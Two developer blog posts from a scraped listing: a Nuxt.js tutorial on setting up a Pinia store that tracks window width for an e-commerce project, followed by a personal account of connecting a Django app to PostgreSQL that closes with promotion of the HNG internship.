![Implementing Pinia for Efficient State Management in Nuxt.js Online Stores](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2n8fz6dzc5ere8729vfv.png) > Check [this post](https://webcraft-notes.com/blog/implementing-pinia-for-efficient-state-management-in) in [my web notes](https://webcraft-notes.com/blog/)! In this article, we will talk about the [Pinia](https://pinia.vuejs.org/) store for Nuxt.js projects. We already built the [main pages](https://webcraft-notes.com/blog/constructing-key-pages-for-your-ecommerce-site) for our e-commerce store and are ready to populate our project with functionality, but first, we need to configure the state management system. Why? Because we want to keep our e-commerce data and part of its functionality in a state management system so that it is available in every component where we need it. I think Pinia is the best option for this purpose. Additionally, you can check [this Pinia guide](https://webcraft-notes.com/blog/vuejs-state-management-guide-pinia-in-practice), or let's just walk through it together. 1. Installing and Configuring Pinia in Nuxt.js Project 2. Creating the First Pinia Store With the importance of state management established, let's dive into the practical implementation of Pinia in our Nuxt.js e-commerce project. ## 1. Installing and Configuring Pinia in Nuxt.js Project The official documentation recommends the "npm install pinia" command for Vue.js projects, but we need the Nuxt.js section, where there is a dedicated package, described [over here](https://pinia.vuejs.org/ssr/nuxt.html). According to the Pinia documentation, we need to run the command "npm install pinia @pinia/nuxt". Then we need to open the nuxt.config.js file in the project root directory and add the @pinia/nuxt module. 
``` export default defineNuxtConfig({ devtools: { enabled: false }, modules: [ '@pinia/nuxt', ], }) ``` Great, we now have the Pinia state management system in our e-commerce store. Next, let's figure out how to create and use a store. ## 2. Creating the First Pinia Store We will create a new "store" folder in the root of our project, and inside that folder create a base.js file. This file will be our first store, holding the global data that needs to be available everywhere, such as modal and notification status or the window width. Next, we use the "defineStore" function to create a new store, passing an object as a parameter. That object contains an id (a unique store name), state (a callback that returns the stored values), actions (an object of functions that mutate the stored values), and getters (an object of functions that expose those values). In some cases we will need the device window width, which is why I suggest creating such a value in our first store. We will add "windowWidth" as our store value, "aWindowWidth" as our first action that updates "windowWidth", and "gWindowWidth" as our first getter that returns the "windowWidth" value. ``` import { defineStore } from 'pinia'; export const useBaseStore = defineStore({ id: 'base', state: () => ({ windowWidth: 1200 }), actions: { aWindowWidth(payload) { this.windowWidth = payload; }, }, getters: { gWindowWidth() { return this.windowWidth; } } }) ``` Now we will import the "base" store into the app.vue file and add an event listener that calls the action and updates the "windowWidth" value. Also, do not forget to remove that event listener when the component is unmounted. 
``` <script> import { useBaseStore } from "./store/base"; export default { name: "App", computed: { baseStore() { return useBaseStore(); } }, methods: { updateWindowWidth() { this.baseStore.aWindowWidth(window.innerWidth); console.log(this.baseStore.gWindowWidth); } }, mounted() { this.updateWindowWidth(); window.addEventListener('resize', this.updateWindowWidth); }, unmounted() { window.removeEventListener('resize', this.updateWindowWidth); }, } </script> ``` Let's rebuild our project and check the result. ![Nuxt js implementing Pinia](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/at4lhkvn9zxeh8toidvm.png) Okay, looks great: we have a window width value and confirmation that our store was implemented successfully. We have successfully set up Pinia and launched our first store, laying the groundwork for effective state management in our Nuxt.js e-commerce platform. We'll go deeper into Pinia's features in the next articles and build extra stores to handle different parts of our e-commerce platform, such as product filtering or cart management. The best way to learn something is to build it on your own, and the same goes for coding, but if you need the source code for this tutorial you can get it [here](https://buymeacoffee.com/webcraft.notes/e/257947).
webcraft-notes
1,909,003
Journey to Backend Development
Having been a frontend developer for years, transitioning to backend development was a bit of a...
0
2024-07-02T13:35:03
https://dev.to/nifilat/journey-to-backend-development-4pla
Having been a frontend developer for years, transitioning to backend development was a bit of a struggle, but a fun one. I started my journey in tech by learning Python, and it always stuck with me, so it was no surprise when I chose Django as the backend framework I wanted to learn. Starting off, connecting to a database was a challenge for me. During a project I recently worked on, it was not easy to establish a connection between my Django application and a database. This problem hindered the development process and put the whole application at risk. My task was to create a link between Django and PostgreSQL so that data could be both read from and written to the database. ## **Step-by-Step Solution** **Step 1: Identifying the Problem** I examined the error logs and found frequent connection timeouts when the application attempted to connect to the database. This meant there was a potential problem with either the database server or the connection string. **Step 2: Setting Up PostgreSQL** I made sure that PostgreSQL was installed and running properly. I used the commands below on my local machine to verify the status and start the PostgreSQL service: ``` sudo service postgresql status sudo service postgresql start ``` **Step 3: Configuring Django Settings** I then updated settings.py in my Django project (it lives in the folder named after your project, under the main project directory) with the correct database configuration: the database name, the user, the password, the host address of the database server, and the port number. 
The following is part of the amended settings.py file: ``` DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': 'mydatabase', 'USER': 'oluwanifemi', 'PASSWORD': 'password', 'HOST': 'localhost', 'PORT': '5432', } } ``` **Step 4: Installing psycopg2** To enable Django to communicate with PostgreSQL, I needed to install the psycopg2 library, the PostgreSQL adapter for Python, which I did using pip. **Step 5: Applying Migrations** With the database configuration set up, I applied the migrations to create the necessary database tables. **Step 6: Testing the Connection** To verify that the connection was successful, I created a simple view in Django to interact with the database. I added a new entry to one of the models and retrieved it to ensure data was being stored and fetched correctly. I enjoyed solving this backend challenge because it taught me that persistence in my learning process is paramount, and that is why I believe I should continue learning through the HNG internship. I am excited to solve harder puzzles and to work with experienced developers who share my commitment to lifelong learning. Through the HNG Internship program and the access to mentors it provides, my growth potential in backend development is limitless. I encourage anyone interested in enhancing their technical skills to explore the HNG internship program. You can learn more about the program [here](https://hng.tech/internship) and you can also apply for the premium feature [here](https://hng.tech/premium).
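For reference, the commands behind Steps 4 and 5 above could look like the following (a sketch: the post names the package only as psycopg2, and `psycopg2-binary` is the commonly used pre-built variant):

```shell
# Step 4: install the PostgreSQL adapter for Python
pip install psycopg2-binary

# Step 5: generate and apply the migrations that create the tables
python manage.py makemigrations
python manage.py migrate
```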
nifilat